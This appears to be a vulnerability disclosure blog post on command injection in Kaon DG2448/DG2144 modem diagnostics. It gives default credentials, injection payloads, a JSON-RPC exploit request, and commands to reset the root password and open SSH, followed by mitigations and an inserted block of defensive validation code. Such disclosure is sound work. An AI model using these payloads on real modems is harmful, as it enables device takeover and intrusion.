Kaon DG2144 Exploit : Root Command Injection( & How To Enable SSH )

Command Injection Vulnerability in Kaon DG2448 & DG2144 Modems

Published on 7/30/24 3:17 PM

Introduction

In this post, I’ll be sharing my findings on a critical command injection vulnerability I discovered in the Kaon DG2448 and Kaon DG2144 modems. The vulnerability is a severe flaw that allows attackers to execute arbitrary commands with root privileges through the modems' web interface. I will explain the details of how the exploit works, the potential impact, and how users and organizations can protect themselves.

The Vulnerability Overview

Upon analyzing the modems’ web service, I found that several diagnostic functions are vulnerable to command injection. These functions include:

  • Ping (under Diagnostics Tab)
  • Traceroute (under Diagnostics Tab)
  • NsLookup (under Diagnostics Tab)
  • Target (Found under Connectivity Check Tab)

These functions are designed for network diagnostics, but the lack of input sanitization opens them up to command injection vulnerabilities. Attackers can leverage this flaw to execute arbitrary shell commands on the device, potentially leading to a full system compromise.

Exploit Details: How It Works

Prerequisites

To exploit this vulnerability, an attacker must:

  • Gain access to the modems’ web interface using the default credentials:
    • Username: admin
    • Password: admin@DG2144
    (The default credentials are widely known and, if not changed, provide an easy entry point for attackers.)
  • Once logged in, the attacker can exploit the vulnerable fields under Diagnostics and Connectivity Check. By injecting commands into these fields, an attacker can execute arbitrary code.

The Command Injection

The attack begins by interacting with the Ping function, located under the Diagnostics tab. The attacker injects a command into the "Target" field, which is intended for network diagnostics but is vulnerable to command execution.

For example, by injecting the following command:

& cat /etc/passwd

This simple command causes the modem to execute the cat command, allowing the attacker to read the contents of /etc/passwd—a file that contains critical user information.

The output might include sensitive data such as:

root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
...
admin:x:0:0::/home/admin:/bin/false

This leak of sensitive system information could help attackers craft further attacks or escalate their privileges.

The image below shows another example of a vulnerable API endpoint, in which the request was sent directly over the WebSocket, making a local file inclusion (LFI) directly exploitable.

Exploiting the Vulnerability

The most concerning part of this vulnerability is that it lets attackers execute arbitrary commands on the system. For instance, an attacker can append additional commands to the ping target, which the modem executes while handling the WebSocket request. The WebSocket (JSON-RPC) request used to trigger the attack looks like this:

{
    "jsonrpc": "2.0",
    "id": 1317719,
    "method": "api",
    "params": {
        "path": "/admin/ping",
        "action": "post",
        "msg": {
            "target": "& cat /etc/passwd",
            "size": "16",
            "no": "3"
        },
        "sid": "2e14d9d31758725543fc2404aeec17eb"
    }
}

When executed, this WebSocket request triggers the modem to run the following shell command:

ping -c 3 -s 64 -i 1 -W 1 & cat /etc/passwd > /tmp/ping_result 2>&1 &

This results in the modem reading sensitive system data (i.e., /etc/passwd) and storing it in /tmp/ping_result.

Further Exploitation: Gaining Root Access

The attack doesn’t stop there. Since the system executes arbitrary commands via these diagnostic functions, the attacker can escalate the exploit by running additional commands. For example:

& echo -e "password\npassword" | passwd root
& iptables -D zone_lan_input 2
& iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT

With these commands, an attacker can:

  • Change the root user’s password.
  • Modify iptables firewall rules to allow SSH traffic on port 22.
  • Enable SSH access, granting the attacker full remote access to the device.

These actions would enable an attacker to take full control of the modem and potentially use it as part of a larger network attack.

The Impact of the Vulnerability

If exploited, this command injection vulnerability gives attackers the ability to:

  • Read sensitive information, such as user credentials and system files.
  • Change system configurations, including enabling SSH access, modifying user privileges, and adjusting firewall settings.
  • Gain full root access to the device, giving them complete control over the modem and the potential to pivot into the broader network.

Mitigation and Recommendations

If you’re using a Kaon DG2448 or DG2144 modem—or any device that may be vulnerable to similar issues—here are some essential security practices to mitigate this vulnerability:

  • Change Default Credentials: Always change default usernames and passwords to strong, unique values to prevent unauthorized access.
  • Update Firmware: Check for firmware updates from the manufacturer. Vulnerabilities like this can often be fixed through security patches. If updates are unavailable, consider replacing the device with a more secure model.
  • Limit Web Interface Access: Use firewall rules to restrict access to the admin interface. Ensure that only trusted IPs can interact with the modem’s web interface.
  • Implement Input Validation: Ensure that all input fields, especially those used for diagnostics and configuration, are properly sanitized and validated to prevent command injection.
  • Disable Unnecessary Features: If you’re not using specific diagnostic functions (e.g., Ping, Traceroute), consider disabling them to minimize the attack surface.
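As an added illustration that is not from the original post or from Kaon's firmware (whose web backend is not shown), the following Python models the flawed command construction described in the "Exploiting the Vulnerability" section next to the validated, shell-free version that the "Implement Input Validation" recommendation calls for. The command template and the target/size/no field names are reconstructed from the JSON-RPC message and shell command quoted in this post; the function names are hypothetical.

```python
import ipaddress
import re

# RFC 1123 hostname label: letters, digits, hyphens; no leading/trailing hyphen.
# A label can never start with '-', so a validated target can never be parsed
# as an extra ping option either.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def vulnerable_ping_command(target, size, count):
    """Models the flawed construction the post describes (assumption: the
    firmware pastes the raw field into a shell string). With the target
    '& cat /etc/passwd' the shell sees a second command. Returned, not run."""
    return f"ping -c {count} -s {size} -i 1 -W 1 {target} > /tmp/ping_result 2>&1 &"


def is_valid_target(target):
    """Accept only an IPv4/IPv6 literal or an RFC 1123 hostname."""
    if not isinstance(target, str) or not 1 <= len(target) <= 253:
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass  # not an IP literal; fall through to the hostname grammar
    labels = target.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def safe_ping_argv(target, size, count):
    """Validate every field and build an argv list for
    subprocess.run(argv, shell=False). No shell is involved, so '&', ';',
    '|' or backticks cannot start a second command, and the type/range
    checks keep size and count from smuggling in extra options."""
    if not is_valid_target(target):
        raise ValueError("invalid target")
    try:
        size, count = int(size), int(count)
    except (TypeError, ValueError):
        raise ValueError("size and count must be integers") from None
    if not (0 <= size <= 65507 and 1 <= count <= 10):
        raise ValueError("size or count out of range")
    return ["ping", "-c", str(count), "-s", str(size), "-i", "1", "-W", "1", target]
```

Passing the returned list to subprocess.run with shell=False (the default) and capturing stdout replaces both the shell and the shared /tmp/ping_result file.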

Conclusion

The Kaon DG2448 and DG2144 modems are vulnerable to a serious command injection flaw that allows remote attackers to gain root access to the devices. This vulnerability is caused by improper input validation in the web interface's diagnostic functions. If left unpatched, it could have severe consequences for users, especially those using these devices in production or unsecured environments.

As always, it’s essential to follow best security practices: change default credentials, apply firmware updates, limit exposure, and always be on the lookout for new vulnerabilities. By staying vigilant, you can help protect your devices and networks from malicious exploitation.
